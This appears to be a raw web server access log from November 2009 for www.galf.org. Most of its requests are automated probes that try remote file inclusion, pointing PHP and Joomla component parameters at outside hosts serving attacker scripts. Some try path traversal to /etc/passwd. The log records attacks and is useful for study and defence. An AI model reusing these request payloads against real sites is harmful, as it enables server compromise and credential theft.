94.79.54.195 - - [09/Nov/2009:04:31:56 -0800] "GET /logs/access_090316.log/convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
140.113.223.66 - - [09/Nov/2009:04:32:08 -0800] "GET /logs/access_090511.log/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
140.113.223.66 - - [09/Nov/2009:04:32:13 -0800] "GET /logs/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
140.113.223.66 - - [09/Nov/2009:04:32:13 -0800] "GET /?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:04:34:15 -0800] "GET /logs/access_090914.log/convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.75.221.85 - - [09/Nov/2009:04:35:31 -0800] "GET /logs/scripts.log HTTP/1.1" 200 1114112 "-" "Mozilla/3.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
140.113.223.66 - - [09/Nov/2009:04:36:04 -0800] "GET /logs/access_090511.log%20%20/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.144.247.22 - - [09/Nov/2009:04:37:21 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.144.247.22 - - [09/Nov/2009:04:37:21 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.144.247.22 - - [09/Nov/2009:04:37:21 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [09/Nov/2009:04:37:48 -0800] "GET //?path%5Bdocroot%5D=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:04:37:50 -0800] "GET //?path%5Bdocroot%5D=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
114.4.12.3 - - [09/Nov/2009:04:39:35 -0800] "GET /?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
114.4.12.3 - - [09/Nov/2009:04:39:35 -0800] "GET /logs/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
114.4.12.3 - - [09/Nov/2009:04:39:35 -0800] "GET /logs/access_090511.log/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:04:40:04 -0800] "GET /logs/access.log/convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.79.54.195 - - [09/Nov/2009:04:40:04 -0800] "GET /convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.79.54.195 - - [09/Nov/2009:04:40:04 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.6.232.171 - - [09/Nov/2009:04:40:58 -0800] "GET /logs/access_090316.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.6.232.171 - - [09/Nov/2009:04:41:12 -0800] "GET /logs/access_091005.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
195.254.134.50 - - [09/Nov/2009:04:41:33 -0800] "GET /index.php?x=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
195.254.134.50 - - [09/Nov/2009:04:41:36 -0800] "GET /index.php?x=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
217.144.247.22 - - [09/Nov/2009:04:46:23 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.144.247.22 - - [09/Nov/2009:04:46:23 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.144.247.22 - - [09/Nov/2009:04:46:23 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.4.12.3 - - [09/Nov/2009:04:46:59 -0800] "GET /logs/access_090511.log%20%20/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:04:50:55 -0800] "GET /logs/access_090720.log///?path%5Bdocroot%5D=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:04:50:56 -0800] "GET //?path%5Bdocroot%5D=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:04:50:56 -0800] "GET /logs///?path%5Bdocroot%5D=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 200 4948 "-" "libwww-perl/5.805" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:04:50:57 -0800] "GET /logs/access_090720.log///?path%5Bdocroot%5D=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:04:50:58 -0800] "GET //?path%5Bdocroot%5D=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:04:50:58 -0800] "GET /logs///?path%5Bdocroot%5D=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 200 4948 "-" "libwww-perl/5.805" "www.galf.org"
211.133.240.90 - - [09/Nov/2009:04:55:17 -0800] "GET /mail.inc.php?skin_board_path=http://www.medisite.fr/id???? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
211.133.240.90 - - [09/Nov/2009:04:55:17 -0800] "GET /logs//mail.inc.php?skin_board_path=http://www.medisite.fr/id???? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:04:55:18 -0800] "GET /logs/access_090525.log///?path%5Bdocroot%5D=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:04:55:22 -0800] "GET /logs/access_090525.log///?path%5Bdocroot%5D=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:04:59:23 -0800] "GET /logs/access_090803.log%20%20//index2.php?page=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:04:59:23 -0800] "GET /index2.php?page=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:04:59:23 -0800] "GET /logs//index2.php?page=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:05:00:40 -0800] "GET /logs/access_090803.log//index2.php?page=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:00:45 -0800] "GET /include/footer.php?_path[counter]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:00:45 -0800] "GET /logs//include/footer.php?_path[counter]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:00:45 -0800] "GET /logs/access_090309.log//include/footer.php?_path[counter]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:05:01:17 -0800] "GET /logs/access_090713.log//index2.php?page=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [09/Nov/2009:05:01:51 -0800] "GET /logs/access_090316.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [09/Nov/2009:05:01:51 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [09/Nov/2009:05:01:51 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:05:01:53 -0800] "GET /logs/access_090921.log%20%20//?cfg[rootPath]=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:05:01:53 -0800] "GET /?cfg[rootPath]=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:05:01:53 -0800] "GET /logs//?cfg[rootPath]=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:05:01:55 -0800] "GET /logs/access_090921.log%20%20//?cfg[rootPath]=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:05:01:55 -0800] "GET /logs//?cfg[rootPath]=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:05:01:55 -0800] "GET /?cfg[rootPath]=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:02:20 -0800] "GET /include/footer.php?_path[counter]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:02:20 -0800] "GET /logs//include/footer.php?_path[counter]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:02:20 -0800] "GET /logs/access_090309.log//include/footer.php?_path[counter]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.144.247.22 - - [09/Nov/2009:05:03:40 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.144.247.22 - - [09/Nov/2009:05:03:40 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.144.247.22 - - [09/Nov/2009:05:03:40 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.34.10.1 - - [09/Nov/2009:05:05:21 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:05:21 -0800] "GET /include/mail.inc.php?skin_board_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:05:21 -0800] "GET /logs/access_090309.log//include/mail.inc.php?skin_board_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [09/Nov/2009:05:08:23 -0800] "GET /?cfg[rootPath]=http://come.kr/bbs/data2/temp/id1(feelcomz).txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [09/Nov/2009:05:08:23 -0800] "GET /logs//?cfg[rootPath]=http://come.kr/bbs/data2/temp/id1(feelcomz).txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [09/Nov/2009:05:08:48 -0800] "GET /logs/access_090921.log%20%20//?cfg[rootPath]=http://come.kr/bbs/data2/temp/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:15:03 -0800] "GET /include/mail.inc.php?skin_board_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:15:03 -0800] "GET /logs/access_090511.log//include/mail.inc.php?skin_board_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:15:03 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [09/Nov/2009:05:15:53 -0800] "GET /logs/access_090921.log//?cfg[rootPath]=http://come.kr/bbs/data2/temp/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:16:54 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:16:54 -0800] "GET /logs/access_090921.log%20%20//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:16:54 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:05:17:24 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:05:17:24 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:05:17:24 -0800] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:05:17:43 -0800] "GET /logs/access_091012.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [09/Nov/2009:05:18:13 -0800] "GET /mail.inc.php?skin_board_path=http://lnx.mp3dmultimediastudio.it/demo/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [09/Nov/2009:05:18:13 -0800] "GET /logs//mail.inc.php?skin_board_path=http://lnx.mp3dmultimediastudio.it/demo/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [09/Nov/2009:05:18:13 -0800] "GET /logs/access_090518.log//mail.inc.php?skin_board_path=http://lnx.mp3dmultimediastudio.it/demo/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [09/Nov/2009:05:19:02 -0800] "GET /logs/access_090511.log//mail.inc.php?skin_board_path=http://lnx.mp3dmultimediastudio.it/demo/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:19:39 -0800] "GET /main.php?_shop_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:19:39 -0800] "GET /logs/main.php?_shop_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:19:39 -0800] "GET /logs/access_090803.log%20%20/main.php?_shop_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:19:41 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/idd.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
93.190.48.203 - - [09/Nov/2009:05:19:41 -0800] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/idd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
93.190.48.203 - - [09/Nov/2009:05:19:41 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/idd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
66.34.10.1 - - [09/Nov/2009:05:20:53 -0800] "GET /logs/access_090803.log/main.php?_shop_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:20:53 -0800] "GET /main.php?_shop_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:20:53 -0800] "GET /logs/main.php?_shop_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [09/Nov/2009:05:21:40 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [09/Nov/2009:05:21:40 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [09/Nov/2009:05:21:40 -0800] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:22:01 -0800] "GET /main.php?_shop_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:22:01 -0800] "GET /logs/access_090525.log/main.php?_shop_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:22:01 -0800] "GET /logs/main.php?_shop_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:22:16 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:22:16 -0800] "GET /appserv/main.php?appserv_root=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:22:19 -0800] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:22:19 -0800] "GET /appserv/main.php?appserv_root=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:22:19 -0800] "GET /logs//appserv/main.php?appserv_root=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:22:19 -0800] "GET /logs//appserv/main.php?appserv_root=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:22:31 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/idd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:22:31 -0800] "GET /logs/access_091012.log//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/idd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:22:31 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/idd.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:22:39 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:22:39 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:22:39 -0800] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:23:04 -0800] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:05:23:33 -0800] "GET /logs/access_091012.log//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:23:34 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:23:34 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:23:34 -0800] "GET /appserv/main.php?appserv_root=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:25:05 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:26:01 -0800] "GET /logs/access_090831.log//appserv/main.php?appserv_root=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:26:56 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:27:40 -0800] "GET /logs/access_090831.log//appserv/main.php?appserv_root=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:05:28:28 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:05:28:28 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:05:28:29 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:05:28:29 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.15.235.58 - - [09/Nov/2009:05:28:29 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.pl/search?q=index+of+%2Flogs&btnG=Szukaj&hl=pl&lr=&client=firefox-a&rls=org.mozilla%3Apl%3Aofficial&sa=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.galf.org"
83.15.235.58 - - [09/Nov/2009:05:28:30 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.galf.org"
83.15.235.58 - - [09/Nov/2009:05:28:31 -0800] "GET /logs/access.log HTTP/1.1" 200 473061 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.galf.org"
